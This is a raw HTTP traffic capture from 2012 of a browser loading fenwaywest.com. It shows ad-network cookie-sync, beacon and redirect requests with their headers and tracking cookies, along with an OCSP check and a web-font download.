Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: _t=93750fa4-311f-11e2-95aa-0025900e0834
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 35
Server: RTB
Etag: &quot;0f4e929dd5bb2564f7ab9c76338e04e292a42ace&quot;
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref=&quot;http://as.chango.com/static/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Set-Cookie: _t=93750fa4-311f-11e2-95aa-0025900e0834; Domain=chango.com; expires=Wed, 16 Nov 2022 01:30:49 GMT; Path=/
Connection: close
GET /00/72/26/adserv_2672.js?ad_size=728x90&referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQA77oEAAAAAAPX-IAAAAAAAAgAAAAYAAAAAAP8AAAABA3hSEwAAAAAAm2QrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqhT3OyR7xDJK195hRdfly8dHG-p899Mi2NOC2AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F15c83429-2270-477c-9adf-69374f516793lijit_leader..html%2CZ%253D728x90%2526_salt%253D1015090667%2526anmember%253D514%2526anprice%253D140%2526r%253D0%2526s%253D653070%2C95510210-311f-11e2-ab35-13ecb67a31a5%2C1353202249339&nsafe=general&reftype=adnetwork&disp=iframe&tmiv=1&tcb=0.07352466852552497 HTTP/1.1

Host: uat-net.technoratimedia.com
GET /00/72/26/adserv_2672.js?ad_size=728x90&amp;referrer=http%3A//ad.yieldmanager.com/iframe3%3FbV5bEg73CQA77oEAAAAAAPX-IAAAAAAAAgAAAAYAAAAAAP8AAAABA3hSEwAAAAAAm2QrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqhT3OyR7xDJK195hRdfly8dHG-p899Mi2NOC2AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252Fbackuptags%252F520266%252F15c83429-2270-477c-9adf-69374f516793lijit_leader..html%2CZ%253D728x90%2526_salt%253D1015090667%2526anmember%253D514%2526anprice%253D140%2526r%253D0%2526s%253D653070%2C95510210-311f-11e2-ab35-13ecb67a31a5%2C1353202249339&amp;nsafe=general&amp;reftype=adnetwork&amp;disp=iframe&amp;tmiv=1&amp;tcb=0.07352466852552497 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://r1.ace.advertising.com/site=782469/size=728090/u=2/bnum=11199087/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: tads_uid=EAA39E271E934570A4875DED1767D57F; tads_uid_cd=20121117173048-0800; tads_zora=1|15662|1; tads_au=&quot;1|CAE=&quot;
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Set-Cookie: tads_zora=1|15662|2; Path=/; Domain=.technoratimedia.com
tads_au=&quot;1|CAE=&quot;; Expires=Fri, 17-Nov-17 01:30:50 GMT; Path=/; Domain=.technoratimedia.com
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 3115
X-Via: CN-5000
GET /merge?pid=10&3pid=637540824086897895&forward= HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=10&amp;3pid=637540824086897895&amp;forward= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwVjMENwzAMxHbROwLik2Sdu40jJ0sU3T3uhx8S%2FEqTj1iSDicyAesnR8ghtk2ckzbtUcJLfWzMXk250OhR7Gk7bf%2FL40HamjrjgjowdOAOrbqicXkyIb8XsC0aVw%3D%3D
HTTP/1.1 302 Found

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:50 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=0, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwVjcENxCAMBHvhfZZgbePluiHm0sQpvQc%2B%2B5nR7L%2B08i0apMGICEB75fDyKbqJ10mdegthKTb2zJ5NuNBonuyhW22ncpuTuqZMvyAGDBn4uWRe3rgsGDhu3W7XcKs7Wtk54hw%2BL5fPH2k%3D; expires=Mon, 18-Nov-2013 01:30:50 GMT; path=/; domain=.lijit.com
Expires: Sun, 18 Nov 2012 01:30:50 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
GET /merge?pid=2&3pid=CE18BB6A616F611AE1D8637D9E5A86BE HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=2&amp;3pid=CE18BB6A616F611AE1D8637D9E5A86BE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwVjMENwzAMxHbROwLik2Sdu40jJ0sU3T3uhx8S%2FEqTj1iSDicyAesnR8ghtk2ckzbtUcJLfWzMXk250OhR7Gk7bf%2FL40HamjrjgjowdOAOrbqicXkyIb8XsC0aVw%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:50 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwVzLkNwzAQRNFeGHsB7T10poPug6KsJgz3bjqZ5D%2FMp3B5Fk3AxCCZIhoLqpdH0Vl86dCuN0FskNU5PQYTLmGYD0TqpPx%2Fuc0BvTp1P4VMpFKVt9MYpzMuS6RMK5PujbFtsQbHK5jXxgdC86jNV8TWyvcHTrgi3g%3D%3D; expires=Mon, 18-Nov-2013 01:30:50 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:50 GMT
Connection: close
GET /merge?pid=12&3pid=5858721859426781856 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=12&amp;3pid=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwVjMENwzAMxHbROwLik2Sdu40jJ0sU3T3uhx8S%2FEqTj1iSDicyAesnR8ghtk2ckzbtUcJLfWzMXk250OhR7Gk7bf%2FL40HamjrjgjowdOAOrbqicXkyIb8XsC0aVw%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:50 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwVjMENwzAMA3fRuwIiSrLobuPYzRJFd6%2F9IUjwcF8xeYsXGQiiCvB2sae8xPeT16APf5SIqdF3jDZNuWCMnGzlG7VjeSJJX0NH3tAAunZ8Uue807iiWDgsjpe5lzF7oBV3afL7A7flH6E%3D; expires=Mon, 18-Nov-2013 01:30:50 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:50 GMT
Connection: close
GET /merge?pid=13&3pid=50a83a45a735dc4b5be8a818 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=13&amp;3pid=50a83a45a735dc4b5be8a818 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=13532022484877bb0b8a1c13f&amp;rand=1353202248487&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwVjMENwzAMxHbROwLik2Sdu40jJ0sU3T3uhx8S%2FEqTj1iSDicyAesnR8ghtk2ckzbtUcJLfWzMXk250OhR7Gk7bf%2FL40HamjrjgjowdOAOrbqicXkyIb8XsC0aVw%3D%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:50 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJxFjMsNwzAMxXbRuQKin%2FXcbWQ5WaLo7k1OvfBCgh8SepMl4OrQTFUbB2bQi%2Bw2cRSs7GKoN%2Fu8UaOFsVXg0RhpdyrP5fIAbBdXLGVXnTz1DO5eIdieSH3a%2F9ej0mK3r1gnCgL6%2FgBs%2BSI3; expires=Mon, 18-Nov-2013 01:30:50 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:50 GMT
Connection: close
GET /c/cse?a=U HTTP/1.1

Host: connexity.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
Cookie: extdata=7c
HTTP/1.1 200 OK

Content-Type: text/html
Server: Connexity
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 18 Nov 2012 01:30:50 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=157680000, post-check=0, pre-check=0
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;CAO PSA OUR CURa DEVa PSDo PSAo BUS COR UNI COM&quot;,an.pp=&quot;http://www.connexity.com/privacy&quot;,an.oo=&quot;http://www.connexity.com/privacy&quot;,an.bt=&quot;N&quot;
Set-Cookie: COu=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821; expires=Fri, 17-Nov-2017 01:30:50 GMT; domain=.connexity.net; path=/
Etag: &quot;e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821&quot;
Content-Encoding: gzip
GET /bh/rtset?do=add&pid=543921&ev=e97b3656e9741cc9-064a2960f1bef2f7 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=543921&amp;ev=e97b3656e9741cc9-064a2960f1bef2f7 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=3; wf=0; pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393.50a83a45a735dc4b5be8a818.0.0.1353202248368|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; 66900_728X90__POSUNKNOWNXUNKNOWN=1353202372225
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-98-119-224
Date: Sun, 18 Nov 2012 01:30:49 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:50 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393.50a83a45a735dc4b5be8a818.0.0.1353202248368|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921.e97b3656e9741cc9-064a2960f1bef2f7.0.0.1353202250467|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:50 GMT; Path=/
Content-Length: 49
Connection: keep-alive
POST /gsdomainvalg2 HTTP/1.1

Host: ocsp2.globalsign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Server: cloudflare-nginx
Date: Sun, 18 Nov 2012 01:30:50 GMT
Content-Length: 1487
Connection: keep-alive
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Wed, 21 Nov 2012 01:30:50 GMT
Cache-Control: public, max-age=259200
Set-Cookie: __cfduid=df279b398365524a06f0ba0755444daa11353202250; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.globalsign.com
GET /v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&nwid=10000483131&sigv=1 HTTP/1.1

Host: cms.ad.yieldmanager.net
GET /v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&amp;nwid=10000483131&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:47 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=13h5jru4k/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&amp;nwid=10000483131&amp;sigv=1
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
GET /v2/cexposer/SIG=13h5jru4k/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&nwid=10000483131&sigv=1 HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=13h5jru4k/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&amp;nwid=10000483131&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8
Cookie: B=edelvjl8agei5&amp;b=3&amp;s=o4
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:51 GMT
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://cms.ad.yieldmanager.net/v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&amp;nwid=10000483131&amp;sigv=1&amp;SIG=10vogoqtf;x-cookie=rqryiwy8ntrv5&amp;o=3&amp;f=b4
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /c/cse?a=W&B=11&N=0-2b56f1ed0d&R=1176x885c24&T=2&U=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821 HTTP/1.1

Host: connexity.net
GET /c/cse?a=W&amp;B=11&amp;N=0-2b56f1ed0d&amp;R=1176x885c24&amp;T=2&amp;U=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
Cookie: extdata=7c; COu=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821
HTTP/1.1 200 OK

Content-Type: text/html
Server: Connexity
Transfer-Encoding: chunked
Connection: keep-alive
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;CAO PSA OUR CURa DEVa PSDo PSAo BUS COR UNI COM&quot;,an.pp=&quot;http://www.connexity.com/privacy&quot;,an.oo=&quot;http://www.connexity.com/privacy&quot;,an.bt=&quot;N&quot;
Set-Cookie: COu=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821; expires=Fri, 17-Nov-2017 01:30:51 GMT; domain=.connexity.net; path=/
Date: Sun, 18 Nov 2012 01:30:51 GMT
Cache-Control: no-store, max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Encoding: gzip
GET /c/cse?a=L&B=11&N=0-2b56f1ed0d&R=1176x885c24&T=2&P=t&U=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821&Q=v2.0.0,h5rR:n,c:n,h5:n,swf:n,new,h5w:y,swf-w:t,h5rS:5,TS:(run:3ms),(swfemb:674ms),(swf_timeout:1628ms),(FindUIDInLSO:1628ms),(f_newUID:2010ms),(rf:2010ms),(swfrdy:2032ms),(Burl-W:2273ms),(RefreshLSO:3523ms),(wrap:3523ms),(H5lsoS-5:3523ms),(Burl-L:3543ms) HTTP/1.1

Host: connexity.net
GET /c/cse?a=L&amp;B=11&amp;N=0-2b56f1ed0d&amp;R=1176x885c24&amp;T=2&amp;P=t&amp;U=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821&amp;Q=v2.0.0,h5rR:n,c:n,h5:n,swf:n,new,h5w:y,swf-w:t,h5rS:5,TS:(run:3ms),(swfemb:674ms),(swf_timeout:1628ms),(FindUIDInLSO:1628ms),(f_newUID:2010ms),(rf:2010ms),(swfrdy:2032ms),(Burl-W:2273ms),(RefreshLSO:3523ms),(wrap:3523ms),(H5lsoS-5:3523ms),(Burl-L:3543ms) HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://connexity.net/c/cse?a=Q&amp;B=11
Cookie: extdata=7c; COu=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Connexity
Transfer-Encoding: chunked
Connection: keep-alive
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;CAO PSA OUR CURa DEVa PSDo PSAo BUS COR UNI COM&quot;,an.pp=&quot;http://www.connexity.com/privacy&quot;,an.oo=&quot;http://www.connexity.com/privacy&quot;,an.bt=&quot;N&quot;
Set-Cookie: refresh=NoUpdate; expires=Thu, 17-Jan-2013 01:30:51 GMT; domain=.connexity.net; path=/ COu=e97b3656e9741cc9-064a2960f1bef2f7-2175fb3daaf1f821; expires=Fri, 17-Nov-2017 01:30:51 GMT; domain=.connexity.net; path=/
Date: Sun, 18 Nov 2012 01:30:51 GMT
Cache-Control: no-store, max-age=-1, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Transfer-Encoding: binary
GET /templates/yoo_bigeasy/fonts/League_Gothic-webfont.ttf HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/fonts/leaguegothic.css
Origin: http://fenwaywest.com
HTTP/1.1 200 OK

Content-Type: application/x-font-ttf
Date: Sun, 18 Nov 2012 01:30:39 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:38 GMT
Etag: &quot;eccadc-a7f0-4c65267cdc880&quot;
Accept-Ranges: bytes
Content-Length: 42992
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&nwid=10000483131&sigv=1&SIG=10vogoqtf;x-cookie=rqryiwy8ntrv5&o=3&f=b4 HTTP/1.1

Host: cms.ad.yieldmanager.net
GET /v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&amp;nwid=10000483131&amp;sigv=1&amp;SIG=10vogoqtf;x-cookie=rqryiwy8ntrv5&amp;o=3&amp;f=b4 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8


GET /v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&nwid=10000483131&sigv=1&SIG=10vogoqtf;x-cookie=rqryiwy8ntrv5&o=3&f=b4 HTTP/1.1

Host: cms.ad.yieldmanager.net
GET /v1/cms?esig=1~b04e41039133c73fafd60e0ed8cb49a70ecfb061&amp;nwid=10000483131&amp;sigv=1&amp;SIG=10vogoqtf;x-cookie=rqryiwy8ntrv5&amp;o=3&amp;f=b4 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=230&amp;exchange_id=8
HTTP/1.1 302 Found

Content-Type: text/plain; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:54 GMT
